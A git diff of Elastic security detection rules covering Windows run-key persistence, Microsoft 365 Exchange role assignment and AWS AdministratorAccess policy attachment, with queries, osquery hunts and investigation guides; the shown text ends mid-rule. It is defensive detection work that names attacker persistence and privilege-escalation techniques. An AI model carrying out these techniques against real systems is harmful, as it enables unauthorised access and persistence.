"severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Configuration Audit", - "Tactic: Initial Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1566", - "name": "Phishing", - "reference": "https://attack.mitre.org/techniques/T1566/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "97314185-2568-4561-ae81-f3e480e5e695_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_115.json b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_115.json deleted file mode 100644 index 42a7cbf3e77..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_115.json +++ /dev/null @@ -1,126 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - 
"description": "Identifies run key or startup key registry modifications. In order to survive reboots and other system interrupts, attackers will modify run keys within the registry or leverage startup folder items as a form of persistence.", - "from": "now-9m", - "index": [ - "logs-endpoint.events.registry-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Startup or Run Key Registry Modification", - "note": "## Triage and analysis\n\n### Investigating Startup or Run Key Registry Modification\n\nAdversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path 
=\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and \n registry.data.strings != null and registry.hive : (\"HKEY_USERS\", \"HKLM\") and\n registry.path : (\n /* Machine Hive */\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n /* Users Hive */\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\"\n ) and\n /* add common legitimate changes without being too restrictive as this is one of the most abused AESPs */\n not registry.data.strings : \"ctfmon.exe /n\" and\n not (registry.value : \"Application Restart #*\" and process.name : \"csrss.exe\") and\n not user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n not registry.data.strings : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\") and\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\msiexec.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\") and\n not (\n /* Logitech G Hub */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Logitech Inc\" and\n (\n process.name : \"lghub_agent.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\LGHUB\\\\lghub.exe\\\" --background\",\n \"\\\"?:\\\\Program Files\\\\LGHUB\\\\system_tray\\\\lghub_system_tray.exe\\\" --minimized\"\n )\n ) or\n (\n process.name : \"LogiBolt.exe\" and registry.data.strings : (\n \"?:\\\\Program Files\\\\Logi\\\\LogiBolt\\\\LogiBolt.exe --startup\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Logi\\\\LogiBolt\\\\LogiBolt.exe --startup\"\n )\n )\n ) or\n\n /* Google Drive File Stream, Chrome, and Google Update */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Google LLC\" and\n (\n process.name : \"GoogleDriveFS.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Google\\\\Drive File Stream\\\\*\\\\GoogleDriveFS.exe\\\" --startup_mode\"\n ) or\n\n process.name : \"chrome.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --no-startup-window /prefetch:5\",\n \"\\\"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --no-startup-window /prefetch:5\"\n ) or\n\n process.name : \"GoogleUpdate.exe\" and registry.data.strings : (\n 
\"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Update\\\\*\\\\GoogleUpdateCore.exe\\\"\"\n )\n )\n ) or\n\n /* MS Programs */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name in (\"Microsoft Windows\", \"Microsoft Corporation\") and\n (\n process.name : \"msedge.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\\\" --no-startup-window --win-session-start /prefetch:5\",\n \"\\\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\\\" --win-session-start\",\n \"\\\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\\\" --no-startup-window --win-session-start\"\n ) or\n\n process.name : (\"Update.exe\", \"Teams.exe\") and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe --processStart \\\"Teams.exe\\\" --process-start-args \\\"--system-initiated\\\"\",\n \"?:\\\\ProgramData\\\\*\\\\Microsoft\\\\Teams\\\\Update.exe --processStart \\\"Teams.exe\\\" --process-start-args \\\"--system-initiated\\\"\"\n ) or\n\n process.name : \"OneDriveStandaloneUpdater.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\\Microsoft.SharePoint.exe\"\n ) or\n\n process.name : \"OneDriveSetup.exe\" and\n registry.data.strings : (\n \"?:\\\\Windows\\\\system32\\\\cmd.exe /q /c * \\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\"\",\n \"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe /background*\",\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe\\\" /background*\",\n \"?:\\\\Program Files\\\\Microsoft OneDrive\\\\OneDrive.exe /background *\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\??.???.????.????\\\\Microsoft.SharePoint.exe\"\n ) or\n \n process.name : \"OneDrive.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Microsoft OneDrive\\\\OneDrive.exe\\\" /background\",\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe\\\" /background\",\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\\\" /background\"\n ) or\n \n process.name : \"Microsoft.SharePoint.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\??.???.????.????\\\\Microsoft.SharePoint.exe\"\n ) or\n \n process.name : \"MicrosoftEdgeUpdate.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\Expedient\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\*\\\\MicrosoftEdgeUpdateCore.exe\\\"\"\n ) or\n \n process.executable : \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\Installer\\\\setup.exe\" and\n registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\Installer\\\\setup.exe\\\" --msedgewebview --delete-old-versions --system-level --verbose-logging --on-logon\"\n )\n )\n ) or\n\n /* Slack */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name in (\n \"Slack Technologies, Inc.\", \"Slack Technologies, LLC\"\n ) and process.name : \"slack.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\slack\\\\slack.exe\\\" --process-start-args --startup\",\n \"\\\"?:\\\\ProgramData\\\\*\\\\slack\\\\slack.exe\\\" --process-start-args --startup\",\n \"\\\"?:\\\\Program Files\\\\Slack\\\\slack.exe\\\" --process-start-args --startup\"\n 
)\n ) or\n\n /* Cisco */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name in (\"Cisco WebEx LLC\", \"Cisco Systems, Inc.\") and\n (\n process.name : \"WebexHost.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe\\\" /daemon /runFrom=autorun\"\n )\n ) or\n (\n process.name : \"CiscoJabber.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Cisco Systems\\\\Cisco Jabber\\\\CiscoJabber.exe\\\" /min\"\n )\n )\n ) or\n\n /* Loom */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Loom, Inc.\" and\n process.name : \"Loom.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Loom\\\\Loom.exe --process-start-args \\\"--loomHidden\\\"\"\n )\n ) or\n\n /* Adobe */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Adobe Inc.\" and\n process.name : (\"Acrobat.exe\", \"FlashUtil32_*_Plugin.exe\") and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\AdobeCollabSync.exe\\\"\",\n \"\\\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\AdobeCollabSync.exe\\\"\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\Macromed\\\\Flash\\\\FlashUtil32_*_Plugin.exe -update plugin\"\n )\n ) or\n\n /* CCleaner */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"PIRIFORM SOFTWARE LIMITED\" and\n process.name : (\"CCleanerBrowser.exe\", \"CCleaner64.exe\") and registry.data.strings : (\n \"\\\"C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe\\\" --check-run=src=logon --auto-launch-at-startup --profile-directory=\\\"Default\\\"\",\n \"\\\"C:\\\\Program Files\\\\CCleaner\\\\CCleaner64.exe\\\" /MONITOR\"\n )\n ) or\n\n /* Opera */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Opera Norway AS\" and\n process.name : \"opera.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Opera\\\\launcher.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Opera GX\\\\launcher.exe\"\n )\n ) or\n\n /* Avast */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Avast Software s.r.o.\" and\n process.name : \"AvastBrowser.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\AVAST Software\\\\Browser\\\\Application\\\\AvastBrowser.exe\\\" --check-run=src=logon --auto-launch-at-startup*\",\n \"\\\"?:\\\\Program Files (x86)\\\\AVAST Software\\\\Browser\\\\Application\\\\AvastBrowser.exe\\\" --check-run=src=logon --auto-launch-at-startup*\",\n \"\"\n )\n ) or\n\n /* Grammarly */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Grammarly, Inc.\" and\n process.name : \"GrammarlyInstaller.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Grammarly\\\\DesktopIntegrations\\\\Grammarly.Desktop.exe\"\n )\n )\n )\n", - "references": [ - "https://www.elastic.co/security-labs/elastic-security-uncovers-blister-malware-campaign" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^9.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.code_signature.subject_name", - "type": "keyword" - }, - { - "ecs": 
true, - "name": "process.code_signature.trusted", - "type": "boolean" - }, - { - "ecs": true, - "name": "process.executable", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "registry.data.strings", - "type": "wildcard" - }, - { - "ecs": true, - "name": "registry.hive", - "type": "keyword" - }, - { - "ecs": true, - "name": "registry.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "registry.value", - "type": "keyword" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "97fc44d3-8dae-4019-ae83-298c3015600f", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1547", - "name": "Boot or Logon Autostart Execution", - "reference": "https://attack.mitre.org/techniques/T1547/", - "subtechnique": [ - { - "id": "T1547.001", - "name": "Registry Run Keys / Startup Folder", - "reference": "https://attack.mitre.org/techniques/T1547/001/" - } - ] - } - ] - } - ], - "timeline_id": "3e47ef71-ebfc-4520-975c-cb27fc090799", - "timeline_title": "Comprehensive Registry Timeline", - "timestamp_override": "event.ingested", - "type": "eql", - "version": 115 - }, - "id": "97fc44d3-8dae-4019-ae83-298c3015600f_115", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_207.json b/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_207.json deleted file mode 100644 index c61814d81e0..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_207.json +++ /dev/null @@ -1,91 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when a new role is assigned to a management group in Microsoft 365. An adversary may attempt to add a role in order to maintain persistence in an environment.", - "false_positives": [ - "A new role may be assigned to a management group by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Exchange Management Group Role Assignment", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Exchange Management Group Role Assignment\n\nMicrosoft 365 Exchange Management roles define permissions for managing Exchange environments. Adversaries may exploit this by assigning roles to unauthorized users, ensuring persistent access. 
The detection rule monitors successful role assignments within Exchange, flagging potential unauthorized changes that align with persistence tactics, thus aiding in identifying and mitigating unauthorized access attempts.\n\n### Possible investigation steps\n\n- Review the event details to confirm the event.action is \"New-ManagementRoleAssignment\" and the event.outcome is \"success\" to ensure the alert is valid.\n- Identify the user account associated with the role assignment by examining the event.dataset and event.provider fields, and verify if the account is authorized to make such changes.\n- Check the history of role assignments for the identified user to determine if there are any patterns of unauthorized or suspicious activity.\n- Investigate the specific management role that was assigned to understand its permissions and potential impact on the environment.\n- Correlate this event with other recent activities from the same user or IP address to identify any additional suspicious behavior or anomalies.\n- Consult with the relevant IT or security teams to verify if the role assignment was part of a legitimate administrative task or change request.\n\n### False positive analysis\n\n- Routine administrative role assignments can trigger alerts. Regularly review and document legitimate role changes to differentiate them from unauthorized activities.\n- Automated scripts or tools used for role management may cause false positives. Identify and whitelist these tools to prevent unnecessary alerts.\n- Changes made during scheduled maintenance windows might be flagged. Establish a process to temporarily suppress alerts during these periods while ensuring post-maintenance reviews.\n- Role assignments related to onboarding or offboarding processes can appear suspicious. Implement a verification step to confirm these changes align with HR records and expected activities.\n- Frequent role changes by specific users with administrative privileges may not indicate malicious intent. 
Monitor these users' activities and establish a baseline to identify deviations from normal behavior.\n\n### Response and remediation\n\n- Immediately revoke the newly assigned management role from the unauthorized user to prevent further unauthorized access or changes.\n- Conduct a thorough review of recent activity logs for the affected account to identify any suspicious actions taken since the role assignment.\n- Reset the credentials of the compromised account and enforce multi-factor authentication to enhance security.\n- Notify the security team and relevant stakeholders about the incident for awareness and further investigation.\n- Implement additional monitoring on the affected account and similar high-privilege accounts to detect any further unauthorized attempts.\n- Review and update access control policies to ensure that only authorized personnel can assign management roles in Microsoft 365.\n- Consider conducting a security awareness session for administrators to reinforce the importance of monitoring and managing role assignments securely.", - "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"New-ManagementRoleAssignment\" and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/powershell/module/exchange/new-managementroleassignment?view=exchange-ps", - "https://docs.microsoft.com/en-us/microsoft-365/admin/add-users/about-admin-roles?view=o365-worldwide" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "98995807-5b09-4e37-8a54-5cae5dc932d7", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "98995807-5b09-4e37-8a54-5cae5dc932d7_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9aa4be8d-5828-417d-9f54-7cd304571b24_8.json b/packages/security_detection_engine/kibana/security_rule/9aa4be8d-5828-417d-9f54-7cd304571b24_8.json new file mode 100644 index 00000000000..d2ef02579d4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9aa4be8d-5828-417d-9f54-7cd304571b24_8.json @@ -0,0 +1,141 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An adversary with access to a set of compromised credentials may attempt to persist or escalate privileges by attaching additional permissions to compromised user accounts. 
This rule looks for use of the IAM AttachUserPolicy API operation to attach the highly permissive AdministratorAccess AWS managed policy to an existing IAM user.", + "false_positives": [ + "While this can be normal behavior, it should be investigated to ensure validity. Verify whether the user identity should be using the IAM `AttachUserPolicy` API operation to attach the `AdministratorAccess` policy to the target user." + ], + "from": "now-6m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user.name", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.access_key_id", + "event.action", + "user.target.name", + "event.outcome", + "cloud.account.id", + "cloud.region", + "aws.cloudtrail.request_parameters" + ] + }, + "language": "eql", + "license": "Elastic License v2", + "name": "AWS IAM AdministratorAccess Policy Attached to User", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS IAM AdministratorAccess Policy Attached to User\n\nThe AWS-managed `AdministratorAccess` policy grants full access to all AWS services and resources. \nWhen attached to a user, it effectively elevates that user to full administrative privileges. \nAn adversary with `iam:AttachUserPolicy` permissions can abuse this operation to escalate privileges or maintain persistence. \nThis rule detects `AttachUserPolicy` events where the attached policy name is `AdministratorAccess`.\n\n#### Possible investigation steps\n\n- **Validate intent and context.** \n Identify the calling user (`aws.cloudtrail.user_identity.arn`) and the target IAM user (`aws.cloudtrail.request_parameters.userName`). \n Confirm whether this was an intentional administrative action, part of provisioning automation, or a potential privilege escalation. \n\n- **Review CloudTrail event details.** \n Check `source.ip`, `user_agent.original`, and `source.geo` fields. \n Compare to historical login or automation behavior. Unrecognized IPs, non-SDK user agents, or new regions may indicate misuse. \n\n- **Correlate with related IAM activity.** \n Search CloudTrail for additional IAM events around the same time (`CreateUser`, `CreateAccessKey`, `AttachGroupPolicy`, `PutUserPolicy`, etc.) that could indicate lateral movement or persistence attempts. \n\n- **Review the target user\u2019s permissions.** \n Determine if the target user already had elevated privileges or if this represents a meaningful privilege increase. \n Check for new API calls from the target user post-attachment, especially `CreateAccessKey`, `UpdateAssumeRolePolicy`, or S3 access attempts. \n\n- **Investigate associated entities.** \n Look for other alerts tied to the same caller or target within the past 48 hours to identify potential correlated activity. \n\n### False positive analysis\n\n- **Legitimate administrative change.** \n Policy attachments may be expected during provisioning or troubleshooting. Validate through change management records. \n- **Authorized automation.** \n Some CI/CD pipelines or identity automation systems temporarily attach this policy. 
Review automation logs and intended IAM behavior. \n- **Delegated admin scenarios.** \n Verify if the calling user or role is part of a delegated IAM administration group.\n\n### Response and remediation\n\n> Per AWS IR Playbooks, unauthorized administrative policy attachment represents a Privilege Escalation event.\n\n**1. Immediate containment**\n- Detach the policy. Remove the `AdministratorAccess` policy from the affected IAM user immediately (`aws iam detach-user-policy`). \n- Rotate credentials. Rotate passwords and access keys for both the caller and target users. \n- Restrict IAM permissions. Temporarily remove `iam:AttachUserPolicy` privileges from non-administrative roles during scoping. \n- Enable or confirm MFA for affected accounts. \n\n**2. Evidence preservation**\n- Export related `AttachUserPolicy` CloudTrail events \u00b130 minutes from the alert to a secure evidence bucket. \n- Preserve GuardDuty findings and AWS Config snapshots for correlation. \n\n**3. Scoping and investigation**\n- Search CloudTrail for subsequent use of the affected user\u2019s credentials. \n Look for newly created keys, S3 access, or changes to IAM trust policies. \n- Review other accounts for similar policy attachment attempts from the same user or IP. \n\n**4. Recovery and hardening**\n- Reinforce least privilege by granting only role-based admin access instead of direct user-level AdministratorAccess. \n- Implement IAM service control policies (SCPs) to prevent attachment of `AdministratorAccess` except for trusted roles. \n- Enable CloudTrail, GuardDuty, and Security Hub across all regions. \n- Regularly audit IAM policy attachments through AWS Config or CloudFormation drift detection. \n\n### Additional information\n\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/):** response steps related to IAM policy modification and unauthorized privilege escalation. \n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/):** for containment, analysis, and recovery guidance. \n- **AWS Documentation:** [AdministratorAccess Policy](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_job-functions.html#jf_administrator). \n- **Security Best Practices:** [AWS Knowledge Center \u2013 Security Best Practices](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/). 
\n", + "query": "iam where event.dataset == \"aws.cloudtrail\"\n and event.provider == \"iam.amazonaws.com\"\n and event.action == \"AttachUserPolicy\"\n and event.outcome == \"success\"\n and stringContains(aws.cloudtrail.request_parameters, \"policyArn=arn:aws:iam::aws:policy/AdministratorAccess\")\n", + "references": [ + "https://docs.aws.amazon.com/IAM/latest/APIReference/API_AttachUserPolicy.html", + "https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AdministratorAccess.html", + "https://hackingthe.cloud/aws/exploitation/iam_privilege_escalation/" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.request_parameters", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9aa4be8d-5828-417d-9f54-7cd304571b24", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS IAM", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", + "Tactic: Persistence", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account 